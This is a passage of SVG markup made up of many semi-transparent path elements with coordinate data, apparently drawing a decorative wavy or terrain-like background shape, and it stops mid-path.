<path d=\"M615.28,43.58a6.49,6.49,0,0,1-3.64.67c-2.37-.09-4.73-.22-7.1-.34-2,1.84-4.12,2.37-5.53,1.37l-1.27-.4c-3.89,2.68-8.45,3.06-11,.9L580,49.12l6.27,2.67c3.06-1.3,6.64-2.9,10.31-4.27.66-.25,1.68.48,2.54.77l1.28,0c2.18-2.06,4.28-1.29,6.42.13a4.86,4.86,0,0,0,2.56,1.08c3.71-.3,7.4-.81,11.1-1.31.21,0,.35-.54.52-.82-.26-.29-.53-.57-.79-.85Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M507.12,48c-.67.39-1.39,1.18-2,1.11-3.18-.35-6.35-.9-9.5-1.46-.31-.06-.52-.64-.78-1h-1.36l-6.75-.09H484l-10.48,2.29,0,1.24c5.62.81,11.31,2.46,16.85,2.09,3-.2,5.47-.82,8,1.06.6-3.51,1.47-3.82,4.77-3.15,2.15.43,4.49-.12,6.75-.24L508.44,48Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M850.88,16.19l5.58,2.33q15.19,3.06,30.4,6.12a22,22,0,0,1,2.23.68l2.07.77,5.43,3.21a17.66,17.66,0,0,1,4.35-.07,48.5,48.5,0,0,1,5.84,2.1l1.39-1.16c-3.15-1-6.25-2.3-9.46-3.05C882.78,23.41,866.82,19.82,850.88,16.19Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M576.37,50.06c-3.79.19-7.58.34-11.36.5l-1.29.43c-.05.49-.11,1-.16,1.47l.86.35,1.25-.23h.72l2.67.39a48.3,48.3,0,0,0,5.4-1.12,31.65,31.65,0,0,0,4.27-2.07l-2.08-.28C576.55,49.69,576.47,50.06,576.37,50.06Z\" transform=\"translate(0 0)\"\n opacity=\"0.3\"></path>\n <path d=\"M1059.41,43.77l-.77.61c-.24,1.13-.47,2.26-.71,3.39a18.41,18.41,0,0,1,2.82-2.05c.93-.45,2.43-1.08,3-.67,2.79,1.93,4.23.19,5.75-1.68a22.42,22.42,0,0,0-4.62-.68A37.77,37.77,0,0,0,1059.41,43.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M486.42,71.5c-3.79-.28-7.57-.59-11.36-.88l.77,1.08,3.3.13,11,1.19.4-1-.42-.41C488.86,71.59,487.64,71.58,486.42,71.5Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M527.5,50l-2.07.62,2.17,4.4L531,51.23c-.47-.39-.94-.78-1.4-1.18Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M614.07,8.49h-2l0,1.26,2.81.44C614.57,9.62,614.32,9.05,614.07,8.49Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1321.16,59.25l-.73.86Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1320.43,60.11l-.65.75Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.18,54.36c-1.27,1.52-2.76,3.37-4,4.89C1322.42,57.73,1323.91,55.88,1325.18,54.36Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1326.56,52.74c-.21.23-.42.48-.65.75C1326.14,53.22,1326.35,53,1326.56,52.74Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1327.11,52.14c-.17.17-.35.37-.55.6C1326.76,52.51,1326.94,52.31,1327.11,52.14Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1325.91,53.49l-.73.87Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1319.78,60.86l-.55.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M490.08,71.64l.42.41.95-.4c-.2-.67-.4-1.34-.59-2Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1086,41.78l-4.89-.68C1082.87,44.39,1083.61,44.49,1086,41.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1076.57,42.78l.45-1.1-1.31.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M565.79,29.66c.06-1.93-.63-4.54,2.58-4.94-1.36-3.09-2.72-.45-3.76.19s-1.65,1.89-2.45,2.88c.21-2.7-.49-6.21,3.19-6.42,5.16-.29,9.71-4.39,15.25-2.3.42.15,1.4-1.2,2.12-1.86-3.88-.15-7.73-1.19-11.6.57-2.71,1.23-6,1.38-8.43,3-1.57,1-2.22,3.68-2.88,5.74-.33,1.07.65,2.59.25,3.58A4.58,4.58,0,0,1,557.24,32c-.34.1-1.7-1.43-1.62-2.1a49.65,49.65,0,0,1,1.49-6.3A3.94,3.94,0,0,0,554.27,25c-.57.65-.81,1.6-1.41,2.19-2.5,2.45-2.2,7.69,1.09,8.56,2.94.79,6.48.12,9.56-.67C565.92,34.5,565.73,31.88,565.79,29.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M590,17.37c2.15,1.32,4.17.62,5.05-2.05-3-.28-6-.64-9-.8-1.78-.1-3.49.23-3.33,2.69C585.19,16.1,587.47,15.79,590,17.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M523.5,50.6l-6.22-.66C519.18,51.84,521.13,53.28,523.5,50.6Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M544.57,52.59l4.79-.53-6.14-.22Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M539.19,51.31H535Q537.09,54.13,539.19,51.31Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M674.64,5.51c3.24,2.44,6.72,1.7,10.21.74C681.62,3.7,678.1,5,674.64,5.51Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M621.45,9.64l-4,.6C619,11.45,620.43,12,621.45,9.64Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M557.51,52l3.44.5C560,51.14,558.9,50.51,557.51,52Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M678,35.46l-1.27,0c-2,.15-4.63-2.1-5.91,1.06-.88,2.19-.79,4.75,1.62,5.94,1.26.62,3.1,0,4.67,0C676.91,40.05,681.62,38.29,678,35.46Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M642,34.88l-1.44,2.06,2.08,3.75c-5.91.72-7,.08-6.56-3.72q.84-2.46,1.7-4.92L642,33.53c0-1,.27-2.25-.21-3a42.76,42.76,0,0,0-3.9-4.46c-5.63,3.6-4.11,9.68-5.71,14.76,3.08.93,5.82,1.68,8.51,2.58,1.68.55,2.88.21,2.71-1.65A63.89,63.89,0,0,0,642,34.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M654.52,37.15c-3-1-4.73.23-5.47,3.53a46,46,0,0,0,5.11,3.74,2.69,2.69,0,0,0,2.54-.71C658,41.13,656.79,37.88,654.52,37.15Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M380.12,72.88h1.16l2.19-5.26-6.27.06Q378.67,70.29,380.12,72.88Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M395.07,63.86l-.15.12c1.42.52,2.34.41,3-.09l-.49.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M399.1,60.78q-2,1.55-4,3.08l2.32.13.49-.1A4.77,4.77,0,0,0,399.1,60.78Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1664.81,72.6c-3.76.14-6.25-1-5.79-5.51-8.24.44-12.2-4.51-14.84-10.85l-5-.11,1.38-4.74L1637.29,50l-1.19-.25-2.21,3.28c-3.28,0-6.71-.25-10.11,0-2.36.17-3.93-.55-5-2.57-2.3.18-4.39.65-4.6,3.8-3.45-1.88-5.94.25-8.64,1.62-2.88,1.45-5.82,2.79-8.73,4.18,0,3.7-3.85,4.65-5.47,7.21-.19.3-2.22-.56-4.11-1.08a5,5,0,0,1-1.9,1.28c-1.07.3-2.75.47-3.42-.14-2.52-2.26-4.74-4.86-7.28-7.57L1569.3,64c.26.79.58,1.71,1,3-4.84,0-8.94-.8-11.86-4.8-1-1.44-4.38-.65-5.42,1.28-.62,1.15-1,2.4-1.61,3.69-3.49-1.8-6.64-2.52-10.12.2l-1-6.9-1.73,1a28.62,28.62,0,0,1-.39,3.35,3,3,0,0,1-5,1.65c-3.85-3.61-4.45-3.68-8.87-1a9.11,9.11,0,0,1-1.13.48c-.07-1.6.41-3.62-.34-4.33-1-.89-2.92-.69-4.44-1a11.3,11.3,0,0,0-3-.6,4.21,4.21,0,0,0-2.82,1.14c-3,4.1-5.26,4.64-9.73,2.09a38.14,38.14,0,0,0-3.73-1.53l3.55,4.65c-3.76-.14-5.79-1.6-7.27-3.65-1.3-1.8-2.32-2.25-4.45-1.1-3.31,1.78-6.88,3.07-10.48,4.63l-1.82-2.69c-1.9.35-2.84,4-5.56,1.39.28-.32.56-.59.8-.9.67-.86,1.71-1.67,1.85-2.62.09-.57-1.27-1.93-1.92-1.9a3.45,3.45,0,0,0-2.45,1.77c-.94,2.21-2.11,3.13-4.3,1.57l-3.38,4-2.57-3.17L1458,65.6l-.72-.38c.4-1.32.81-2.64,1.36-4.43a8.88,8.88,0,0,0-1.73,1.1c-2.58,2.82-2.2,2.48-4.89-.34-1.6-1.68-4.57-2.06-7.18-3.14l-2.06,6-6.73-4.13-1.95,4.61c-3.35-1.89-1.19-4.44-1.42-6.94l-3.06,1.52c-2.06-4.1-5.47-6.59-8.27-6l0,0c0,1.45,0,2.91-.17,4.35s-.11,3.36-.89,3.8a24.34,24.34,0,0,1-7.85,3c-.84.14-2.57-2-3-3.39-.92-2.73-2.66-2.19-3.72-.87-1.66,2.07-3,3.61-5.78,1.86-.4-.25-1.47.59-3,1.26.28-3.12.52-5.88.78-8.8-3.9.23-4.2,4.76-6.84,7.06l2.77.25c-.3,2.21-.58,4.37-.9,6.79-4.36,1.6-8.33,1-12-3.82-.45,2.68-.71,4.27-1,5.86l-1.23,0-.09-5.57c-4.85-.22-5.88-1.3-7.45-7.5a10.27,10.27,0,0,0-1.53-2.56c-.86.79-2.06,1.42-2.52,2.39a.8.8,0,0,0-.07.2,17.91,17.91,0,0,0,3.35.38,31.12,31.12,0,0,1-2.69,4.41,7.22,7.22,0,0,0-.73-.83,7,7,0,0,0,2.45,3.09,4.87,4.87,0,0,1,1.22,2c.26.57.23,1.69.54,1.77,4.24,1.08,3.72,5.67,6.08,8.1a3.78,3.78,0,0,1,.28,1.17c4.9,1.81,11.61,0,7.49,7.22.93,0,1.86,1.46,2.78,1.5a1.93,1.93,0,0,0,1.31-1.52c0-.09.18-.23.25-.21,4.15.85,5.2-1.72,6-5,.1-.38,2.77-.11,5.19-.16.64-1.69,1.6-4.22,2.34-6.2,2.16-.59,4-1,5.69-1.6,2.08-.75,3.19-.5,3.27,2a2.8,2.8,0,0,0,4.42,2.37l2-1.18,1.72-1.08c.23.8.41,1.44.59,2.08l4.49-1.27c.76-3.18,4.75-6.31,7.59-5.52,1,.27,1.55,1.92,2.32,3,2.69-.45,5.41-.82,8.09-1.36,4.48-.92,9.45,2.06,13.59-1.73.22-.21.86.05,1.31.08a27.18,27.18,0,0,0,5,.23c2.43-.32,4.79-1.43,7.21-1.5,7.3-.21,14.6-.08,21.91-.07,3.35.46,6.71.91,10.06,1.38l4-.22c1.29-.37,2.7-1.28,3.85-1,3.3.72,6.47,2.06,9.62-.47a3.24,3.24,0,0,1,2.29-.3c5.84.94,11.67,1.9,17.49,3a11.89,11.89,0,0,1,2.91,1.47l1.34-.12a7.76,7.76,0,0,1,2.34-1c3.41-.24,6.83-.33,10.25-.46a.46.46,0,0,1,.33.07c5.27,4.14,11.33.27,17,2l3,5.61c2.23-3.22-.92-7.65,3.41-8.37,2.25.11,4.63-.19,6.71.47,1.82.57,4.56.94,4.14,4.18a15.57,15.57,0,0,0,.45,3.63l3.83-.53c-.31-1-1-2.12-.76-2.82.37-1,2-2.38,2.25-2.23,2.63,1.6,3-.55,4.13-3,3.4,2,6.75,3.57,9.72,5.7,2,1.42,3.35.52,5-.2,2-3.33,3.3-3.71,6.5-2.07a36,36,0,0,0,3.67,1.4c1.91-4.84,8.35-7.47,13.09-5.71a10.29,10.29,0,0,0,3.93.58c2.66-.1,4.6.16,5.78,3.26s3.55,1.73,5.58-.06c5.34,4.46,11.13,7.37,18.27,5.13-.56-1.46-1.13-2.92-1.69-4.37C1668.51,72.76,1666.65,72.53,1664.81,72.6Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1367.53,62.55a31.12,31.12,0,0,0,2.69-4.41,17.91,17.91,0,0,1-3.35-.38,5.14,5.14,0,0,0-.07,4A7.22,7.22,0,0,1,1367.53,62.55Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a12.91,12.91,0,0,1,5.93.69c.72.26,2-.44,2.76-1a12.13,12.13,0,0,0,2-2.32c.51,2.08,1,3.92,1.4,5.67l1.88.53a13.59,13.59,0,0,0,.91-3.92,7.69,7.69,0,0,0-1.12-4.78c-3.86-5.23-3.61-8.25,1.59-12.2l-1-2.41-3.27,1.17c-1.39,3.27-4.58,2.18-7,2.88l-4.15.64-2.78,5.82c.14.88.27,1.75.41,2.62,1.78,1.32.75,2.12-.54,2.86-1.6.92-3.2,1.82-4.8,2.73l.07.06,1.06,0A24.11,24.11,0,0,1,1350.53,53.61Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1363.39,59.73l.08-.16-.13-.06Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.64,56.67c.24,1,.47,1.9.7,2.84l.13.06q.6-1.2,1-2.37Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1350.53,53.61a24.11,24.11,0,0,0-6.62-1l-1.06,0,2.37,2.32A20.91,20.91,0,0,1,1350.53,53.61Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1904.67,105c-4.63-4.2-8.58-9.71-16.11-8.24a1.27,1.27,0,0,1-.94-.32c-2.87-2.78-5.66-2-8.11.22-2.16-1.59-3.91-3.38-6-4.25-1.51-.62-4-.66-5.22.23-2.55,1.92-5.26,1.35-7.94,1.61-.49,0-1.34-.59-1.46-.44-2.78,3.3-4.85.39-7.25-.82l-.95,1.13-8-.57,1.62,1.88,1.31-.09,3.89.68a27.36,27.36,0,0,0,5.26.81c3.42-.11,6.85-.51,10.26-.92a6.53,6.53,0,0,0,2.39-1.06c2.51-1.5,4.93-.16,5.11,2.8a7.37,7.37,0,0,0,.4,1.8c3.42-.78,6.66-2.57,9.08-1.79,2.83.9,5.25.33,7.87.48,1.77.1,4.3.69,5.07,1.94C1897.6,104.32,1899.41,105.54,1904.67,105Zm-54-10.88Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1779.25,94.49c-.56-.77-1.56-2.16-2.4-3.34L1772,94.69l-7.26-7.64c-.54,1.71-.92,2.92-1.59,5l-5-5.65-1,3.54c-2.11-1.68-4-3.19-5.9-4.71l-.63.64c.37,1.73.75,3.47,1.12,5.2a6.41,6.41,0,0,1,1.94-.09c4.59,1.21,9.17,2.43,13.71,3.79a12.94,12.94,0,0,1,2.87,1.77c3-1.41,6-3.41,9,0l1.22-.18c1.74-.63,3.55-1.15,5.23-1.93,2.21-1,4.32-2.27,6.47-3.43-2.52.6-5,1.14-7.54,1.8C1783,93.24,1781.29,93.84,1779.25,94.49Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1712.48,80.52c-2.44,2.26-4.44,1-6.69.37-1.71-.45-3.42-.87-5.13-1.31l.38.94c-1.25.82-2.67,2.51-3.7,2.3a26.81,26.81,0,0,1-7-3A28.61,28.61,0,0,0,1675,76.56l-1.76.73a2.52,2.52,0,0,1,.08.55c2.37.33,4.74.68,7.12,1,.54.07,1.18-.17,1.65,0,2.47,1.08,4.91,2.26,7.36,3.4L1692,82c1.18.3,2.57.3,3.5,1,2.19,1.5,4.06,2,6.39.17,1-.73,2.92-1.24,3.82-.74,4.17,2.29,8-.62,12-.33C1716.35,80.15,1714.05,79.07,1712.48,80.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1899.35,115.9l0,0c.09.56.18,1.13.28,1.7,2.05-.79,4.27-.89,7.51.73,0-1.07,0-2,.05-2.8A10.94,10.94,0,0,0,1899.35,115.9Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1836.36,93.51a2.14,2.14,0,0,1-2.07.29c-3-2.07-7.49-2.27-8.52-6.81-.06-.27-.72-.4-1-.53a13.68,13.68,0,0,1-2.71,2.53c-2.28,1.15-4.69,2-7.06,3l4.21.73,1.28-.88,2.63-.37c1.11-.09,2.37-.56,3.3-.2,3,1.16,6,2.63,8.94,4l3.23-1,2.65-1.15C1839.51,91.87,1837.9,91.28,1836.36,93.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1727.53,82.77c-2,1.34-7.35,1.1-9.59-.42-.6,3.09,1.11,3.46,3.55,3.09,6-.94,11.13.12,13.86,6.49.34.8,1.84,1.12,2.81,1.66-1.94-3.06-4-6.07-5.79-9.2C1731.16,82.33,1729.86,81.22,1727.53,82.77Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1795.58,90.34l4.15,5.71,3.54.31,2-.34-.12-1.32A15.34,15.34,0,0,1,1795.58,90.34Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1743.5,89.25c-1,.45-1.29,2.49-1.89,3.84l3-3,4,3.33,2.54-1.61c-1.19-.39-2.39-.76-3.57-1.19C1746.11,90.13,1744.42,88.82,1743.5,89.25Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1807.27,89.45c-.13,1.85-.21,3-.29,4.23l2.87,1,3.18-2C1810.42,94,1809.32,90.83,1807.27,89.45Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1813,92.69a5.39,5.39,0,0,0,.68-.43Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1741.6,93.1l-2.77.67C1740.15,95.2,1741.08,95,1741.6,93.1Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1793.51,90.08l1.31-.27-1.08-1.71C1793.62,89.11,1793.56,89.6,1793.51,90.08Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1380.52,59.15c2.15,1.79,3.21.94,5.41-4.5a45.93,45.93,0,0,0-3.11-5.31c-.66-.85-2-1.21-3-1.79-.22,1-.94,2.3-.57,3,1.18,2.42.69,4.27-1.13,6.07l-3.17-.95-1.07.76,2.7,4.92Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1362.6,59.18c-1.5-.63-3.34-.38-5-.73-4.94-1.05-9.84-3-14.78-3.07-4.45-.06-8.28-1.57-12.35-2.59-.47-.11-.85-.6-1.27-.91l-1.29-.41c-.71-.12-8.9,11-9.52,10.67-16.28-9.53-32-9.06-39.59,8.59-1.77,4.08-5.83,4.23-10.7,3,.88,2.86,3.27,1.83,5.35,1.7,4.06-.25,8.11-.74,12.16-.66,7,.15,13.29-5.28,20.49-5.78,4.87-.34,7.63-5.18,12.53-4.58,2.64.33,12.67-10,15.23-9.32,4.88,1.38,9.82,2.69,14.55,4.5A46.36,46.36,0,0,1,1358.72,65a35,35,0,0,1,3.57,3,27.72,27.72,0,0,0,5.24-5.44A11.18,11.18,0,0,0,1362.6,59.18Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1265.91,71.75a4.27,4.27,0,0,1-2.24.72c1.53.5,3,1,4.45,1.31a6,6,0,0,1-.16-.67C1267.84,72.52,1266.21,71.56,1265.91,71.75Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M1228.49,66a13.19,13.19,0,0,0-4-.24c-2.93,0-5.88.15-8.8-.06-7-.51-13.91-1.31-20.88-1.76-6.08-.39-12.18-.55-18.27-.68-7.89-.18-15.79-.24-23.68-.32-4,0-8.08-.08-12.12,0-2.11,0-4.22.37-6.33.54a5.91,5.91,0,0,1-2.61,0c-3.66-1.62-7-1-10.37.87-.75,1.58-1.48,1.55-2.2,0l-1.22,0-2.47,2.29a30.58,30.58,0,0,1-3-4.62c-.44-1-.08-2.38-.81-4l-2.85,3c-.14-.28-.53-.73-.43-1,2-4.41-.9-6.44-4-8.29a3.72,3.72,0,0,0-2.5-.41c-6.11,1.53-6.11,1.57-9.09-4.29a30,30,0,0,1-1.2-2.79c-1.64-4.42-1.64-4.43-5.69-2.55-2.35,2.71-3.09,2.61-4.89-.69l-4,.59-.45,1.1-.86-.65-6.19,1.23c-1.52,1.88-3,3.62-5.75,1.69-.59-.41-2.09.22-3,.67a19,19,0,0,0-2.82,2l-2,.7c-.44,3.32-3.51,2.53-5.46,3.49l5,4.48a74.68,74.68,0,0,0,4.52-7c2-3.94,5.19-1.66,7.81-2.26l.54,1-6,4.6c3.36.48,5.89,1.22,8.44-.93,1-.87,2.82-.88,4.28-1.19,1-.22,2.4.09,3.1-.48,2.25-1.84,4.36-.89,5.7.66.68.79-.24,3-.5,5l9.51,3.68c-.43,1.15-.94,2.51-1.44,3.87,3,0,5.92-.2,8.84.05,4.21.35,8.52,0,12.2,3.2,2,1.71,4.78,2.65,7.38,3.28,1.4.33,3.81-.24,4.58-1.28,1.7-2.31,4.35-3.72,6.47-1.89s3.4,1,5.06-.56,3.53-2,5.67,0c1.06,1,3,1.06,4.62,1.22,2,.2,4,0,6.53,0,2.43-2.7,6-.62,9.34-.88,1.77-.13,3.65.36,5.32-.07,3.63-.91,7.06-1.14,10.22,1.17,3.44,2.51,5.13,2.45,8.17-.26a3.89,3.89,0,0,1,2.32-1c3.09,0,6.18.25,9.26.49,5.39.41,10.85,1.66,16.14,1.17,10-.92,18.81,3.75,28.26,5.23a40,40,0,0,0,6,0c0-.36,0-.72,0-1.08a4.5,4.5,0,0,0,6.73-.29,3.33,3.33,0,0,1,4-1.08c1.67.53,3.29,1.64,5.08,1.59-5.4-1.8-11.22-4.2-15.81-4.32C1241.28,68,1234.8,68.2,1228.49,66ZM1092.16,55.67a.55.55,0,0,1-.52-.22c-.06-.14.13-.37.21-.56l.57.24C1092.34,55.32,1092.3,55.62,1092.16,55.67Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M539.19,51.31q-2.1,2.82-4.2,0l-4-.08-3.36,3.83-2.17-4.4-1.93-.06c-2.37,2.68-4.32,1.24-6.22-.66l-7.43-.1c-2.26.12-4.6.67-6.75.24-3.3-.67-4.17-.36-4.77,3.15.57,1.38,1.14,2.77,1.91,4.62l-5.83.32L493.47,60q-1.26,3.79-2.53,7.59c0,.68-.06,1.35-.08,2,.19.68.39,1.35.59,2l2-1.35c0-4-.33-8.25,4.45-9.92,2.53-.89,3.32-2.36,3.13-4.81a33.14,33.14,0,0,1,.16-3.84c1.47.38,2.59.64,3.69,1,1.27.38,2.53,1.23,3.77,1.19,6.47-.24,11.1,2.17,12.94,8.66.8,2.81,2.64,4,5.32,4.32-.43-2.48-2.15-5.21,1.37-6.9-.4-3,2.15-5.88,5.72-6a10.91,10.91,0,0,1,5.51,1c3.26,1.92,4.15,0,5.06-2.42l-1.35-.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M407.63,65c.19-.78-1.11-1.93-1.73-2.91a19.22,19.22,0,0,1,3.79,2.16,10.51,10.51,0,0,0,2.88,2,15.17,15.17,0,0,1,3.2-.36h.3a6.77,6.77,0,0,0,1.27-1.29c-.56-.2-1.17-.24-1.49-.56s-.91-.87-1.33-1.33l-8.81-1.17a5.59,5.59,0,0,1-1.37.82c-.65.16-1.31.3-2,.45a4.38,4.38,0,0,0-.43,1.49,3.89,3.89,0,0,1,2.34,1.85h0a7.52,7.52,0,0,0,3.54.79A2.26,2.26,0,0,1,407.63,65Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M454.88,67.81c-7.81-1.91-16.06.63-23.59-2.89-.28-.13-.68,0-1,0l-9.62-1.27a10.5,10.5,0,0,0,1.83,2.4,32.85,32.85,0,0,1,11.19,1.73c3.6,1.33,7.7,1.37,11.59,1.87,4.35.56,8.78-.92,13.12,1.78,2.21,1.37,5.71.6,8.61,1a45.91,45.91,0,0,1,4.89,1.08c1.74.39,3.46.79,3.94-1.71l-.77-1.08C468.32,69.73,461.44,69.41,454.88,67.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M397.39,64l.22.08a1.81,1.81,0,0,0,.27-.18Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M596.54,47.52c-3.67,1.37-7.25,3-10.31,4.27L580,49.12l-1.23.66a31.65,31.65,0,0,1-4.27,2.07,48.3,48.3,0,0,1-5.4,1.12c0,.32,0,.65,0,1,3.79-.66,7.76-1.87,9.71,4.77,1.76-8,5.42-2.43,8.15-2.87.34-.84.64-1.62,1-2.44l2.53,1-.27-1.12,4.74-2.09,2.78-2,1.33,0c0-.3,0-.59,0-.89C598.22,48,597.2,47.27,596.54,47.52Z\"\n transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M909.5,30.4l-1.33-.23-1.39,1.16,2.89.56C909.61,31.39,909.55,30.9,909.5,30.4Z\" transform=\"translate(0 0)\" opacity=\"0.2\"></path>\n <path d=\"M689.59,6.87l-4.74-.62c-3.49,1-7,1.7-10.21-.74-6.36.51-12.8.34-18.93,2.74a6,6,0,0,1-4.36-.58c-3.05-1.58-5.77-1.31-7.28,1.54-1.29,2.41-2.39,2.22-4,.46-2.08-2.26-4.24-2.5-6.83-.48-.89.69-2.6.4-3.94.43-2.61.05-5.23,0-7.84,0-1,2.33-2.46,1.81-4,.6l-2.63-.05L612,9.75l-1.3,0L607.9,11l-12.81,4.28c-.88,2.67-2.9,3.37-5.05,2.05-2.57-1.58-4.85-1.27-7.31-.16h0c-.72.66-1.7,2-2.12,1.86-5.54-2.09-10.09,2-15.25,2.3-3.68.21-3,3.72-3.19,6.42.8-1,1.43-2.26,2.45-2.88s2.4-3.28,3.76-.19l2,2.13,13.75-3.14c.89.15,2.16,2.24,3,2.08,2.76-.57,3.08.66,3.23,2.79,0,.66.88,1.26,1.35,1.89.36-1.6-.25-3,0-4.16a11,11,0,0,1,2.19-4c.2-.27,1.37.11,2.07.31,1.35.4,2.7,1.3,4,1.23,4.93-.28,7.66.7,8.81,6.51.47,2.41,1.78,3.41,4.28,3.14a28,28,0,0,1,4.47.2c3.43-.46,6.8-.75,9.24,2.5,1.42,1.89.87,5-1.31,5.25-2.74.29-3.43,1.48-3.32,3.92,0,.63-.76,1.29-1.17,1.94-.17.28-.31.8-.52.82-3.7.5-7.39,1-11.1,1.31a4.79,4.79,0,0,1-2.56-1.08c-2.14-1.42-4.24-2.19-6.42-.13,3.2,2.24,6.41,4.46,9.6,6.71.71.5,1.35,1.11,2,1.67l6.16-4.52,3.65,4.7,3.12-2.22,4.38-5.54,1.5.44c-.09,2-.23,3.94-.24,5.9,0,.73.15,1.89.58,2.07a2.66,2.66,0,0,0,2.33-.28c1.74-1.48,3.27-1.69,5.13-.2a13.22,13.22,0,0,0,3.1,1.4,29.4,29.4,0,0,0,.88-3.44,17.25,17.25,0,0,0-.21-3.11h-7c-.91-3.94,3.58-3.21,5.15-4.57,2.31-2,4.88-.07,6.74,2,5-5,3.8-5.21,12.22-.4l5.06-7.23c.48,2.19.72,3.3,1,4.78,2.1-4.3,2.88-4.3,5.73-1.12a7.44,7.44,0,0,0,4.27,2.35,45.42,45.42,0,0,0,10.16,0,5.08,5.08,0,0,0,3.59-2.81A5.3,5.3,0,0,0,688,40.43c-1.13-1.14-3.13-1.42-5-2.18-.5-2.48-1.7-4.39-5-2.79,3.6,2.83-1.11,4.59-.89,7-1.57,0-3.41.6-4.67,0-2.41-1.19-2.5-3.75-1.62-5.94,1.28-3.16,3.88-.91,5.91-1.06-.44-.78-.83-1.59-1.33-2.33-2.26-3.31-3.87-3.48-6.69-.82a6.4,6.4,0,0,1-2.42,1.67,62.13,62.13,0,0,1-6.15,1l-1.88-1.38-1.52,2h-8.27c1.33-5.28,2.68-10.65,4.11-16.31-4.69,1.4-3.38,6.54-6.6,9-.92-2.35-2.33-4.53-2.5-6.81-.14-2-.06-4.69,2.8-5.56,1.